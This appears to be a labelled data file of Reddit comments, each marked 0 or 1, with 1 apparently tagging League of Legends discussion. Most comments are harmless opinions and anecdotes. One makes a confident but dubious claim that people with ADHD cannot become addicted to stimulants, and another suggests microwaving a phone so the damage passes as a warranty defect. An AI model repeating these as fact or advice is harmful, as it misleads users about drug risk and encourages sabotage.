1	My story:   Season 1 : I basically joined the game, so i had tons of fun discovering all the bits and such. I knew there was some competitive scene, but its not possible to compare it with one we have nowadays.   Season 2 : The game posed a bigger challenge to me now. I started playing ranked a lot, was kinda disappointed i had archived only gold. But i had tons of fun watching streams of pros.   Season 3 : I could say I understood the game, i archived ~50lp D1 at EUW. I was daily spectating LCS and such, but i played the game less.   Season 4 : I trasffered from EUW to EUNE, because most of my friends are playing there. Archived Challenger, enjoying the game in its depth. Playing a lot less and when i do, i enjoy it the most of all the seasons.
1	Situation 1: Rekkles* walks happily to his turret to recall with ~20% of his health. He sees a Requiem going down, but thinks "I've got enough health, no need to use my Barrier". But he hears the Karthus' creepy voice, pops Barrier and continues his way safely back home.   Situation 2: Somebody gets to the edge of a team fight. Karthus uses his ult, but this somebody doesn't hear Karthus' voice, so he should be safe, right? Nope, because right before the ult hits, an enemy auto attacks our somebody and deals just enough damage for Karthus to kill him.
1	Just a quick message to newbies who get a match and dont message before even ending the pairing - have a quick chat with us first to find out if we can offer you anything.   Yes I'm a Gold 5 support main but that doesnt mean I can't play other roles or know something to do with strategy, give us lower ranks a chance.
1	Aside from current situation with useless solutions that riot suggests, no explanation whatsoever and freebies other servers get for much minor issues, I started to see whenever a major tourney/event happens, EUW servers go down the drain with no eminent solution and get fixed after riot has nothing better to do at their schedule. It's not that serverload or technical mumbo-jumbo that screws our servers, it is just neglect from Riot.
0	Looking at it from a different perspective, there's research that shows that people that are overwhelmed with stimuli (lots of noise, videos, flashing lights, etc.) have much higher stress and are more irritable. This might explain why we have people that fulfill those stereotypes of city people and also might explain why there is more crime in cities. On the other hand, do cities have more gun violence, or a higher  RATIO  of gun violence than in rural areas.
0	This. I worked mega corps for a while, got me good opportunities with good start ups, one of which I helped grow to dominate it's space, that then meant when I started my own company I could charge a premium due to a stellar back catalogue of jobs. At the time they were soul destroying but what it did was all added to my brand and knowledge. That way time served in mega corps becomes useful to your game. Do well enough to be recognised (which can be 80 hour weeks, exceptional work AND playing internal politics) and ultimately even within mega corps you can write your own job spec, sit and atrophy as a cog in the machine and you lose momentum, ambition and get institutionalised and easily can become trapped. Do it well, pick when you move on, where you move to, interview the companies to see if they are good enough for your next "investment" and learn when to cash out your returns. For me it means I can charge enough to work 6 days a month and pay the bills, anything past that is gravy but right now I value time with my family more.
0	Upvote. Because Tosh.O is a steaming pile of crap. It's not original, and it's not funny. All the jokes center around ethnicity, sex, or gender and his subject matter is basically stolen. I can have a better time watching youtube videos with my friends instead of some moron failing to be clever in front of a green screen.
0	You know nothing of what you are talking about. There are eyebrows that look good, and eyebrows that look bad. The point of makeup is to take the eyebrows that look bad, and make them look good. Some people have good eyebrows by genetics, and do not need to do this, and most people do not, and try to make them look like the good ones. Most people are good at this, and you can't tell the difference, so you think they are natural, but some people are bad at this, and you look at them and go "AMG, you should just use natural eyebrows because they look so much better" when their natural eyebrows look even worse.   It's a confirmation bias. The only eyebrows that look good to you look natural, and took a lot of work to get there, and the people who failed stand out to you and look awful.   This is ignoring people who intentionally make it look unnatural, but that's a very, very small minority.   Edit:
0	This is great advice.  Story:  there was a huge fuck up at work, where various people in various departments dropped the ball.  The owner of our company sent an email out asking what happened.  Everyone started playing the blame game, or saying "I don't know".  I said "I dropped the ball, it won't happen again."  I got an email back saying simply "thank you".  I'm the only one who still works there.
1	There are currently 473,163 people on this subreddit that are subscribed to it. There are over 100 million viewers on /all each month. /r/leaguoflegends regularly gets to /all with the top few posts.   Therefore we can assume for the popular posts they are seen by upwards of 10-20 million people, if not more. A lot of those people will just read the title and move on, LoL isn't their thing. But some might read comments, I enjoy reading DotA2 and SC2 comments even though I don't play the games, and upvote/downvote a few people. Do you think a random who doesn't play the game will upvote people being toxic? Do you think most people here who look at a thread about a player stepping down will upvote toxicity about said person?
0	I was once 17 or something and was at a new years eve party in a cabin in the woods. It was cold as shit and the host had a fire on in the fireplace that was in the back of the house. Late in the night, when everyone was wasted, i drunkenly decided that he had too much furniture and disassembled a chair to make the fire bigger. It worked and i found it hilarious so i threw in an extra drawer or something. The problem was when the fire was burning  outside  the fire place and on the back room itself. The room ended up catching fire and it burned down that part of the house. It needed to be demolished and rebuilt. But i helped rebuild it and gave part of my own furniture to replace the destroyed stuff.
1	I just want to discuss this on the nerfs as a whole. When they are used the way they should be a.k.a. plat+ rank they take over. There win rate may be low because most people are in bronze/silver and dont know what they need to do to actually make it work. So the win/loss is highly skewed.
0	I think we are missing a couple of things here...   First, there are four economic responsibilities of a government:     Ensuring state security   Protection and welfare of the public   Protection of the environment   Management of the economy     Start with the first three, those are the tasks for which I think most federal employees are hired to accomplish. Jobs come to mind like EPA and DoD scientists, FAA inspectors, air traffic controllers, Park Rangers, active duty personnel. The objective here is to hire only as much as we need to meet these responsibilities. Obama has folded agencies together and cut federal jobs where his administration felt there were redundant positions doing these tasks. What is needed to meet these responsibilities is very subjective but minimizing the personnel and expenditure required is simply responsible. Don't waste money. This is what Obama's downsizing was /u/Demonweed.   The fourth responsibility is very different. This is where the responses to unemployment come in which are meant to manage the economy (albeit spilling into the public welfare part). The way I understand it, job creation bills don't just create a bunch of federal job openings which is what your posts seem to suggest (sorry if I am misunderstanding).   Rather, they increase government spending effectively making the government huge customers of a LOT of companies. (Think of things like investing in infrastructure: the government takes bids for the job which is then contracted out to engineering/building companies who then need more workers). In the process jobs are created secondarily to meet increased demand for labor. These are gov't contractors at most, not federal employees. As such, federal jobs are not responses to poor unemployment numbers as you both mention /u/gufgufguf and /u/Demonweed. You may still be against this spending because people's opinions vary widely regarding this fourth responsibility. Personally I think carefully targeted government spending in this sense does stimulate the economy (it is actually Econ 101). Problems arise when it is not carefully targeted and the spending effectively goes to waste.   What few people debate is that technological advancement does a fantastic job of growing the economy. Obama is a big supporter of investment in innovation. That is where I think gov't spending goes a long way (disclaimer: look at my username, I am definitely biased).
0	This isn't going to do much.  If she can't figure it out, the next guy who she's gargling will have her just take it to get swapped for a new one.  Microwaving it isn't going to leave any noticeable damage, so they'll just assume it's defective.  Since this all sounds like it happened rapidly, the phone will be under warranty.
1	Nah it does not offend me, I do even agree with your stand point. But if you manage to be way shorter and more pregnant with your text and find a better
1	Silver 5 ADC main with three questions :). 1) I typically play MF, but I have recently picked up vayne as I she is very strong now. I typically rush botrk as my first buy (with boots after cutlus). Is this a smart take on her?, also which situations will this not work? 2) As an ADC main what button configs should I change from the defaults. Also how do I effectively make use of the 'a' and '~' keys? 3) How do I play/lane from behind? I know this is broad, but this is the thing I struggle most with in landing phase. Sometimes behind by my own fault, but also sometimes beyond my control from my support/jungle getting caught in lane.   Thanks for your help :)
1	Personally when I used to play a lot more and found it very enjoyable was in S3.  The champion pool was very diversified and what it took to improve your game.  The trinkets I didn't like.  I find it to be a way for the riot to help or make a fix for lazy players.  Prior to League I was very into the Starcraft scene and played a lot of ranked SC2.  To get better and to get the win you cannot be lazy.  Find out what they're building, how can I counter or put myself in a better position that my enemy.  How do I deserve my wins?  Simple, you have to conform to the rules of the game and use the tools within the game to best your opponent.  Sometimes it required you harass the hell out of them to buy time even if it required more work.  Be tenacious in your game.   What I'm trying to say is this.  If your team doesn't buy wards or place them should expect to lose if you don't have a gold lead already.  Those who are more tenacious to help their team with not just winning their lanes but with vision and map control.  The trinkets and ward limitations just seems like an easy way to put a plug on those who complain about not having their allies ward.  Even now warding hasn't gotten any better.  I'd rather the game force the player to fix what's wrong with their play than being given an annoying handout.
0	Yeah ok, if you want to change the subject that's cool. It looks as if you kind of got my first point and if you're more interested in patting yourself on the back for not being one of those smug guys, whatever.  We weren't talking about those who go on this subreddit to get karma or to act superior, I thought you understood that from your first response. You've confused what I said and I think I'm the one to blame  because I don't really make myself too clear.  I'm not going to though because I found this.  "I live in the US. I don't doubt that some people have families that don't approve, although I absolutely doubt that people are getting expelled from school or fired from work (unless they willingly chose to go to school/work for a fanatical church, which would be their own fault) for privately not believing in god and not being a dick about it. r/atheism is just a joke though. I just went and every post was so ridiculous and smug it made my head hurt. I could not be more atheist, but can you seriously look at stuff like their 'Faces of Atheism' posts and not think that is ridiculous?"  It seams that you really don't give a shit about any of those people or the abuse atheists have to face in some communities. You'd rather get your jimmies rustled by the attention whores you could find anywhere in the world. If that's your calling that's fine, go get em. You made an ignorant comment and backed it up with "well these guys over here are annoying". I like to type, that's why I've gone so far to respond to you because if you want the short hand then here,
1	I suck at jungle, always have, and everytime ranked foreces me to play jungle, there's this shaco on the enemy team that i swear is chasing me down in queue's, he comes, steal my red, take everyone after that AND is also on every bush of every lane i try to gank...
0	Yeah, sometimes that doesn't take. I got asked by some kids once in the parking lot of a Walgreen's. At the time I was working midnights, and I was there to pick up a prescription before going to work at something like eleven-thirty at night, so it's pitch dark and the place is deserted. Keep in mind that I'm female and under five feet for intimidation factor. I got approached by four high school aged boys before walking in, and when I told them no to their request for liquor, they started harassing me (calling me a pussy/loser etc. and telling me that they'd mess with my car while I was inside). I ended up telling them that if they didn't leave me alone I was going to call the cops, and that I was going to tell the cashier that they were approaching people in the parking lot. They quick got into their car and peeled out before I'd even made it through the doors.
0	That's complete bullshit. Everyone here seems to think a well done steak means a brick of charcoal. There is huge difference between a good well done steak and a bad one.   It is possible to make a well done steak without burning it. It takes longer or involves a butterfly-cut, but it is possible.   If you are saying that a well done steak has no flavor, that is the same as saying that every cooked part of any steak has no flavor - and the only way to get a proper steak is to not cook it at all.   I usually eat my steak medium-well, but used to get it well done and I've been many places who managed to make a very juicy and tasty steak out of it.
0	Fine, a more technically nuanced reply.   You are talking about brute-forcing a password. That's a retard's game.   What you don't seem to understand is that passwords scale up exponentially. Hardware does not.   If I have a password that takes  x  tries to brute-force, if I add ONE letter, that same password is suddenly 26 times as difficult to crack. Not counting upper/lowercase or numbers.   How many times more powerful is your hypothetical hardware than a $400 laptop? 26 times? It's not. But if I were really paranoid, I add  yet another  single letter. Now the password will take almost SEVENHUNDRED times the time to brute force than the password I started out with. Can you buy a system that's 700x more powerful than a $400 laptop?
1	Hitting the adc/ap carry and one other is usually enough for me to get durable, and the damage isn't as important on the enemy tanks/bruisers. In the best of situations, I charge the enemy adc (who is behind the enemy team) and use the ult to knock the rest of the enemy team out of place. The bonus defensive stats keep me alive long enough to get a full q combo on the adc, and the knockback allows my adc to do their job safely while the enemy team regroups.   I don't think the ult is intended to actually hit the full enemy team. As long as you hit two of them, you get tanky enough to survive the teamfight. For bonus points, if you can initiate while the enemy adc is just infront of their minion wave, you can dash to the minions and knock the adc into your team.   Lastly, if you are already building durable items, then you can save the ult to peel off your teams damage dealers.
0	Well I've focused my entire career on working with learning and attention differences... I've taken neuropsychology classes on all this stuff. In grad school, I wrote a paper on ADHD medications and their longitudinal effects on children and adolescents with ADHD (which was confirmed with brain imaging studies, because ADHD brains differ from non-ADHD brains) in comparison to control children, and I did a 45 minute presentation on my paper. If that isn't enough, I also come from a highly medical family, both immediate and extended (dad, mom, brother, grandfather one, grandfather two, aunt, uncle), several members of which are extremely well-versed in pharmacology and neurochemistry. When I was first diagnosed with ADHD, those same family members (father and aunt, specifically) were kind enough to explain to me the ways in which ADHD medications affect the brain and how and why they are effective in treating the symptoms of ADHD.   There are reasons that can be explained by neurochemistry why people with ADHD do not get addicted to stimulant medications, whereas there exists an addiction threat for people without ADHD who take stimulant medications.   In laymen's terms, the brains of people with ADHD lack the sufficient stimulation to stay "awake" (for lack of a better word). Basically the brain always feels like it is drifting off, zoning out, not paying attention to the world, what have you, because it lacks the necessary stimulants. To fix this, it overcorrects by over-attending to EVERYTHING in the environment. This is why people with ADHD have trouble paying attention to a singular thing; their brain is constantly looking for stimulation, for something new, so that it can stay "awake". Taking stimulant medications provides the ADHD brain with something that "normal" brains are already getting, and it calms them. They feel more "awake" when they have the necessary stimulants, and they can focus their energies into attending to singular tasks, rather than on multiple stimuli within the environment.   Think of it like the ADHD brain can't miss what it doesn't naturally have. The ADHD brain doesn't naturally have enough stimulants, so when it gets them, it's like getting an unexpected bonus present. When it doesn't get that bonus present, it's not a big deal because it just goes back to normal; it's used to not having enough.   However, when the NON-ADHD brain takes stimulant medication, it's giving the brain more of what it already has, and it essentially gets greedy. It's like giving a kid an XBox when he already has a perfectly good PS3, and then him/her getting royally pissed when you take the XBox away. That isn't a perfect analogy haha, but work with me here.   It's a very basic and very much laymen's-terms-based explanation, but I hope that makes sense.
1	The "Pick Order > Call Order" rule is only in place if players reach an impasse.   This is an excellent point and I wish more people would realize this simple concept. It's simply a last resort for when the team has failed to reach an agreement.   I used your quote as the
1	There was a time, long long ago, in a season not unlike this one...When towers truly recognized friend from foe, when they sought to protect the champions of the league, growing stronger when ever a beacon of hope that was an ally was nearby!
1	Actually, SCII has been criticized for nerfing too early as well. Coming out of SC:BW, a lot of Starcraft players were uncomfortable with how much Blizzard got involved with balance rather than letting players iron it out themselves. One particular time this happened a lot of people were on the fence as to whether Blizzard should or should not have gotten involved. Back a little over a year ago in one particular matchup (PvP), the meta strat was to 4gate. If you didn't, you probably died to one. So every PvP for a while was always the same strat for many months. Eventually Blizzard came in and nerfed some timings and other things so people could get away from that. Many pros were upset because at the time of the nerf some particular pros were finally finding a way to break the meta but it never got to develop because Blizzard had stepped in. Some pros were complaining that Blizzard was too hands on in SCII and that this didn't happen as often in SC:BW which allowed BW to develop as amazingly as it did. The other side to this was that the lower level players were getting frustrated with only 4gate and so Blizzard had to appeal to the masses since it is a business after all.
1	As an ADC main, I am not liking the patch. Why did riot nerf one item and buff another item? Riot is basically saying, we've had enough of the caster ADCs--now we want auto attack oriented ADCs. What is Riot's reason for this? They're basically shunning one type of carry and welcoming another one. Their best bet was to implement the IE/Blade/Scimitar changes to bring back the Caits/Trists of the world and nerf the cost of BT rather than making a shitty passive for it and making it way more expensive for a worse item.
1	Vayne. I hated pretty much all ADs expect for Vayne during a long time, she is just so different.   -Her passive allows her to be an awesome chaser. Tired of not being able to finish that low hp target because she is 3mm too far ? Won't happen with Vayne.   -Tumble is her signature move, what makes her different. This spell allows you to dodge A LOT of annoying skillshots like Morgana's bind, Blitz's grab, Cho's rupture,... It also allows her to trade effectively in lane, by quickly using it to get in range and get an auto attack on the enemy AD and get out. It's also the skill that allows her to kite effectively in teamfights or duels. This spell is what makes Vayne so funny to play, she isn't like a turret or a slowly moving target when it comes to teamfights, she is a fast predator.   -Her W is what makes her able to duel against tank or bruisers by mid/late game. % true damage combined with her kiting abilities is what makes her able to beat champs that nearly no other ADs could beat in a straight 1v1 (unless they are super fed of course).   -Her E is the other signature move of Vayne, it needs some practice to land but will allow you to take easy kills, especially combined with Tumble and/or Flash. You're half HP and their bruiser wants to dive you ? Quickly tumble behind him and pin him to the turret : Dead. Their half HP AD wants to get a cs next to his tower ? Pin him to the turret. Their bruiser is following you ? Pin him to a wall and kill,...   -Her R doesn't seem like anything special, but it transforms Vayne into MOTHERFUCKING Vayne. It will make her an enhanced Vayne : Higher damage, higher kiting abilities, better chasing abilities,... It can also allow you to quickly engage a gank from a side by tumbling from a bush,... And it has low cooldowns. Popping the ultimate means shit is gonna go down.
1	Funnily enough, I met the man who would become my husband by being his support bot lane. We still play League together all the time, and I'm more or less permanently his support by this point.
1	First, I want to say I like where your head is at, wanting to have champions to play at various roles. Far too many people jump right in to ranked and only know one role and it can really hurt a team.   With that being said here's my listing of champions to play for each role you asked:   ADC   Lucian - versatile ADC with an escape skill, which can help getting out of stick situations   Graves - great for early lane trading with his passive "True Grit"   Mid   Ziggs - has great long range poke and his aoe damage helps a lot in team fights Ahri - good mid-range assassin type mage with a lot of burst damage   Jungle (the role I main)   Gragas - easy jungle clears and builds tanky. His passive gives you a ton of sustain in the jungle. Go cinderhulk to righteous glory then itemize based on enemy team comp from there   Jarvan/Vi - these are two good pick ups if your team needs some AD. I have found a lot of success going cinderhulk as my jungle item into the new black cleaver. This allows you to soak up a lot of enemy damage while dishing out some of your own   Sejuani - great tank and team fighter. She can make up for a behind team with a well placed ult. Sadly, her early game clear speeds are tough and she can be subject to counter jungling.   If you have any additional questions about the junglers, feel free to pm me. Good luck! :)
1	Dude don't listen to them, you are perfectly right. What Darien does is like a football team would lead 5-0 then proceed to score own goals, thus implying the opposition is rubbish. For instance, in handball, if you mock the enemy (let's say, try to score a goal by kicking the ball with your head) you get a 2 minute suspension. Darien was basically telling Millenium "i'm so good and you're so bad" which is not a right message.
1	Ignorant (the user) states they are in it for the money, not the person/community.   This implies that the changes are not made for the person wanting the change, but for the money the change would bring them.   This means that the changes are not for the community... the LoL playing community. i.e. the ones already playing. This is more of a QOL (quality of life) change, implemented to assist players that have played for a while, not for people new to the game/genre that don't now the importance of said feature. I am only talking about this change in particular, as different changes have different impacts. Most of the changes that people accuse Riot of being money hungry are QOL changes (e.g. implementing various features such as custom item sets that were already made by the users, but made much more accessible by Riot), and this means that it impacts the pre-existing community far more than a new player base.   Also, Riot has no issue with things like custom skins, (as long as you aren't using a purchasable skin) even though it's potential revenue loss (more so, at least, than ultimate timer's in chat).
0	For those oblivious to why guys don't react appropriately to 'friendzoning' here goes an analogy...   Imagine you had the impression your boss might promote you to a management position if you worked really hard. He never gave you any indication that he would promote you, nor that he wouldn't, but since you've seen a number of colleagues get promoted after making enough effort on their jobs you understandably assume you have a chance.   So you bust your ass off for some time but the promotion never comes. You know your boss noticed you have been working harder than others but you find it strange he hasn't approached you yet. So you build some courage and ask him if he thinks you're worthy of being promoted to management. Instead of telling you that he thinks you're not cut for the job, because you might hold a grudge against him or otherwise, he tells you that for now he needs you to continue doing your current job.   How would you feel if that happened to you? I know for sure I would't be feeling happy about it.   At that point you'd have many options. You could continue busting your ass off trying to impress your boss, so that when a management position becomes available you'd be the first he would turn to. You also sense that the boss might not be sure you're the right guy for management - surely putting more effort on the job will show him otherwise.   On the other hand, if you're fed up with the situation, you get angry and tell your boss to go fuck himself. You point out that you've worked much more than John and Bill but they got promoted and you didn't. John and Bill don't work here anymore though, so you ask your boss with angry tears in your eyes, "Why did you have to recruit an unemployed guy with no experience to replace them rather than me?!" Your boss comes up with some politically correct but unsatisfactory answer. You storm out of his office never to return again. As you exit the building you slash your boss' car tires.   Alternatively, if you're level minded, you could simply leave the job and find another one where you might fare better. But that's tough to swallow. You've spent so much time on this job that the thought of getting through all that ass busting on another one in hopes of getting a promotion is already putting you off. You run the risk of deciding to stay on your current job because even if you're unhappy with it you still have an irrational hope that some unexpected event will happen and all the time and effort invested will finally pay off.
0	You're getting downvoted, but I couldn't agree with you more. I was just accepted into ob/gyn residency program. Going into medschool I NEVER thought I'd be interested in this specialty, but I love it. I do a lot of prevention programs in the inner city with at-risk teens. As far as "the pill" goes, yes, it fails- but not nearly as much as one would think. You wouldn't believe how many people come in, find out they are pregnant and say "...but that's not possible! I was on the pill!" I'm talking like one out of fifteen people. Statistically, that's not possible. Then when you start talking to them in depth, 9 times out of 10 it's a factor of incorrect use. "But I've only skipped a few days!"...."I try to take it every day, but sometimes I forget." IF YOU ARE TAKING YOUR BIRTH CONTROL PILL  CORRECTLY  THE CHANCES OF PREGNANCY ARE VERY, VERY SLIM. That's why I stress to these young adults- find a time within a 2 hour window that will work for you most days, such as when you first wake up, or eat lunch. The best way is to set an alarm on your phone and take it at the same time every day. Missed a day? If you have been on the pill for 2 months or more, that most likely won't be a problem. However, always use a backup method such as a condom.   I'm sure a bunch of people will reply with their story about how they got pregnant even though they used the pill correctly- Yes, I get it- that can happen too. But it's fairly rare. If you don't want to get pregnant, use 2 methods.
0	It's a long story. My best girl friend from high school (I'm a guy) was losing her place around christmas and needed a place to stay, so she moved in. We were always fine, or at least it seemed. She was never late with rent or anything and always pitched in for food and whatnot for the house.   But, she didn't clean. Her floor had to be black with dog hair before she'd sweep it. Empty the trash? No. That's a guy's job.  What's a dishwasher?  I'm going to turn on the air conditioner with all the other windows open!   It got old. Quick.   She had a dog too. The dog hated me, for no reason I swear. I have never abused it, ever. I had tried for the 8 months she had been living with me to get the dog to warm up to me, but she wouldn't. She loved Mumma and that was it, nobody else.   About a month and a half ago, we throw her a huge birthday party at our mutual friend's house. HUGE. Vodka watermelon and gummies, jello shots, a fire, a pool, everything. It was probably the best birthday party I've been to. Between everyone, we must have spent $400 getting this party together for her. We invited all our friends (there's about 15 of us all together, its an awesome group!) and everyone had a great night.   That night, she met a guy. And you know, did things. You would expect this, everyone's drunk and makes mistakes and whatever. Well, after that night, she starts leaving for the night to go hang with this guy. I don't say anything for about a week. I figured she made a new friend and they really hit it off. No big deal.   This goes on for a month and a half.   One day, she gets up, and sits at the kitchen table. I get up and start getting ready for work. As I'm about to leave, she gets up and walks out behind me. I assume she wants a ride to work, so I take her (without her even asking, might I add. I felt that was rude of her to just ASSUME) to work.   She gets out of the car and says, "I'm going to need a ride home at 10."   I tell her, "I've been working 6 days straight. I honestly may pass out early tonight. Find someone else to get you because I can't guarantee I'll be awake that long."   She looks at me and says, "No, I'll need a ride home at 10. I'll see you then."   EXCUSE ME?   I'd had it. Fuck that attitude. I had been doing EVERYTHING for her and not asked for anything in return, and this is how I get treated? Noooooo.   So what did I do? I went home from work and went straight to bed!   I finally had to say something to her. Her attitude was atrocious and she didn't seem to care that her dog wouldn't eat, drink, go to the bathroom, sleep, or leave her cage unless she was home. The look on this dog's face was awful. You could tell she was depressed, and she wanted nothing to do with me, so I couldn't help her.   I left her a note (because she would go out all night, and come home at 6am) one morning for her to read when she got up and it basically told her she had 3 options:   1) She needed to be home at night to take care of the dog. The dog was clearly having some sort of issue, but she didn't seem to care.  2) She needed to give the dog to someone who could take adequate care of her. 3) She needed to move out. I wasn't going to be her dog sitter and storage facility.   She wrote me a response that was pretty kind, and raised some questions in me. She said the reason she had been out all the time is that I never made it feel like "our" place. She felt trapped, and that she had to be stuck in her room when I had people over.   This is ridiculous. We have the same friends (remember, the group of 15) and we all hang out together. There's no reason she has to be stuck in her room when people are over.   How could this not be our place? Half of her old place is in storage in my house. We both decided we wanted a chalkboard wall in the kitchen. We both hosted parties at the house. We did groceries together and planned meals together for dinner. We rode to work in the morning together (she never helped for gas, either. But that's a touchy issue for some).   She went on to say that she appreciated me giving her a place to stay and that she would be gone sometime early in the following week, which was fine. I didn't want to start drama because I really didn't want to chance losing our friendship.   Fast forward to the following day. She comes home shortly after I return from work, and everything seems fine. A little uneasy at first, but fine. We start talking about it, and we decide that this is definitely better for the two of us.   The following day, I go to work. She hadn't come home (again) the previous night so I asked her when she was going to start packing her belongings. She doesn't respond. So I text her again a few hours later, and suddenly, her mom's calling me.   What?   "Why are you bugging her at work?! We said she'd be out by early next week! We don't have a truck to move the big stuff because mine's not stickered!"   Why is she having her mother call me? I was just curious when she was getting her stuff out. I didn't want to become a storage facility, seeing she never came home. When would she actually start packing? And your truck isn't stickered? How is that my problem?   Keep in mind she called me at work.   We agree that in a couple days, all of her stuff will be out.   Yesterday, I'm hanging out with a buddy of mine playing playstation, and she comes in with a couple of friends and her mother and start moving belongings out. Nobody says a word to us. We leave them alone (again, not trying to start problems) and go about our thing. They were taking a good chunk of her stuff out, so I figured they were moving everything that day.   "When you leave, can I have the key since you're moving out?" "I'll give you the key when I have everything out." "Yeah, that's today. Can you please leave me the key when you leave with your stuff?" "I'll give you the key when I have everything out."   And then, suddenly, a wild Momasaurus Rex appears.   "WHY ARE YOU BEING SUCH AN ASSHOLE TO HER? WE SAID IN THE NEXT COUPLE DAYS NOT TODAY! WHY CAN'T WE KEEP THE KEY UNTIL WE HAVE ALL THE STUFF OUT? WHAT, DO YOU THINK SHE'S GOING TO ROB YOU? IF YOU THINK THAT, YOU'VE GOT SOME FUCKING TRUST ISSUES BUDDY!"   I've had enough. I stopped talking, and let them go about their business. I honestly hate confrontation, and i'd rather walk away from it and let them do their thing. Out of sight, out of mind. They left for the day with most of her stuff. She left behind a couch, a deep fryer, and some little things.   Today, she came back for the little things and the deep fryer, but leaves the couch in my spare room and leaves me a note on the table. She demands a towel that I used and misplaced be returned, and she will hold my house key until I return it.   ARE YOU FUCKING KIDDING ME? A TOWEL?   I can't believe a towel is going to keep me from getting my key back. After everything this girl as done.   I went over to her new place (she's living with the guy she met at her birthday while she was wasted) and got my key back. I told her I was sorry for the way things turned out, and that was that.   I pride myself in being calm, and I was calm throughout this whole ordeal with them (her and her mother). Never once did I raise my voice, and never once did I try to overpower them when they were talking. It blows my mind that people can be that rude and inconsiderate.
1	I don't understand the argument. You can look up your approximate mmr on lolking, and your "hidden elo" and NOT your rank determines who you're matched with. Here's a video explaining it.
0	Sorry to hear that, but you're in the VAAAAAAAAAAAAST minority. My sister is DEATHLY allergic to peanuts. She will LITERALLY die if she were to eat a handful of them....yet she doesn't go around telling people not to. Every person will react to everything differently.   Hell, people have died because they were allergic to penicillin, yet it's saved MILLIONS of lives!   Not only that, but EVERYTHING in life has risk associated with it. Hell, I take a risk every time I cross the street to go to work! I take a risk that people will obey the rules of the road and not be texting on their phones and blow through the stoplight and kill me.   There's a 1 in 177 chance that you will die in a car crash in your lifetime, yet you (in general, not you specifically) will still get in your car and drive almost every day.
1	That's a good normal build to follow.   For blue build I go: Tear --> Basic boots --> Iceborn --> Upgrade Tear --> Finish boots --> Bloodthirster --> The last two items depend on their team and what they're building, but it's either Banshee's, IE, or Last whisper.   On Ezreal, especially if you're playing blue build, his damage will be lacking until you get a couple items, unless you have a lead. In the case of having a lead your damage will start to be high in lane, because you can pick up your damage items much earlier than normal. All of his fighting and knowing how to win his skirmishes come from practice on him. He's a more difficult adc than some of the others, so he'll take you a lot more practice to be as good at him as the others, but being that he has a high skill cap, you can get really good at him :)
1	I feel like you're a bit overzealous with it.  Personally, when I first started, I didn't notice not having runes because I was one of the few who bought the tiers as I went up; it made sense, because I thought to myself, "What's wrong with these runes?  A buff is a buff, right?"  But I do agree with some of it.  I've had a couple of friends start to play League, and they don't grasp the concept of buying the new items in their store, xD.   When I first started, I did notice that I was shit, but I just assumed that was how all games start out, right?  And then when I learned that you could get all of these shiny things like masteries and runes, I was all excited.  But let's face it, your point of view in this argument is that you're playing with a level 10 or something at level 30, giving him/her opponents that HAVE had a chance to get masteries and runes.  When I introduced friends into League more often, I made a smurf just for that reason, because giving them opponents that are THEIR level make their life a lot easier.
0	What I say in response: thanks! They're great kids!   What I think: damn right! That's because of the forty times I macked them for having done wrong at home!
1	Dude what, twitch chat is next level trash talking. /r/leagueoflegends complains, but its on the minimal margin. People are both impressed and disappointed, and show their emotion.
1	because singed does  sooo  much damage lategame.   Gangplank's damage lategame is either really mediocre, or he's really squishy. If you're not building banshee's, you're doing it wrong.   Jax is jax. once more, if you're building mr, it's fine.   As for lategame, Caitlyn is one of the best ad carries in the game right now, and trynd is  still  one of the strongest full-build champions in the game. He's not as much of a hyper carry as he was, but it's still obscene. You're playing what is right now commonly considered the  most  powerful champion in the game.   morde is a common ban everywhere from 600 elo to 1800. he's one of the best pubstompers in the game.
1	Winning typically cures most losing streaks.   On a more serious non-smartass note, what helped me get out of a 15 game losing streak was playing to win, not to lose. Seriously, this sounds dumb, but it got to the point where I was joining a game and playing as if the game was already lost. I didn't do terribly, but I was almost hoping for my team to feed so that I could continue to complain about how bad Silver league players are. Just changing your attitude and playing like you are the boss makes a huge difference.
1	On top of playing vs smurfs, the overall system of leveling up has so many flaws, the ability to receive tier 3 runes until 20 makes it completely not worth to purchase tier 1 or 2 runes. Along with it, the amount of IP gain is so little, making it practically impossible to purchase multiple champions over 3150 along with purchasing a full rune set at 20. And the last flaw would be the extreme length of time it requires to finally reach level 30, in WoW, someone can easily reach level 90 within the span of 2 weeks. however 2 weeks in LoL playing every day would probably get you to 15 max.
1	In high elo solo queue matches there has been popularity with a support with hard CC (Taric or Leona comes to mind) paired up with a heavy burst caster like brand. The reasoning behind this is that there is much higher volatility in this lane than the traditional support+AD bottom due to the fact that AP carries can burst someone from 100 to 0 whereas AD carries mostly only have auto attacks.   however,  this means that an AD carry must take solo; which isn't the end of the world, but it relies on early kills in lane. Another setback of this strategy is that some AD carries indeed to have high burst in lane (Ezreal) allows you to have a AD + support bottom doing the traditional set-up which works well.   Another thing you'll see is lanes that just plain work together as they have high kill potential. Blitz + Alistar is the most popular one, but I saw Chauster and Loci some time ago do a Lee Sin + Pantheon bottom lane and they did marvelously.
1	Played my first game since the honor system kicked in. I was unaware. Something was terribly wrong with the balance.. no one said one single mean thing to someone else.. and at the end.. the opponents actually said.. gg wp. I was horrified, frightened I had been sucked into another realm.. but then I read this thread.
0	Exactly, the thing is insulting/shaming someone because of a problem just isn't what you do(at least not what I think to be right). Of course you shouldn't aspire to be fat and it should be highlighted as a negative, but rather than making someone like crap you should try encouraging them to lose weight, the same way you would encourage an alcoholic to go to AA or a drug addict to go to rehab or something? Everyone has problems and giving them shit for it will just make it worse. But some discouraging/limits are necessary smoking is taxed incredibly highly compared to shitty food and and everyone's image of a drug addict is the same so why not overweight people too?
0	Why do you have to tell your whole life story when you know she's probably not going to be able to handle it?  If you end up getting married to this woman, sure -- tell about your ex's horoscope, likes and dislikes, and the length of her morning pee for all I care.
0	If you're judging a woman based on how inferior you consider her taste in men to be, then you aren't a "Nice guy." You're faking it to get attention from women. Don't get mad at them when they see through it. If you keep being a "Nice Guy" and parroting what you think she want's to hear, she's going to do the same thing to you. And when she's super "Nice Girl" to you and yet never dates you, you better not come back here talking about how disingenuous women are. That's hypocritical.   Get confident, get clean (Appearance matters. And even if you're fat and unwieldy, at least be fat and presentable) and stop treating kindness like a currency. Most women don't give a shit if you want THEM because the women you're chasing try to take care of themselves. They are only interested in the men THEY are attracted to. If you can't put the effort in to be more appealing than "Assholes", you're just being a self deluding, self righteous ponce.
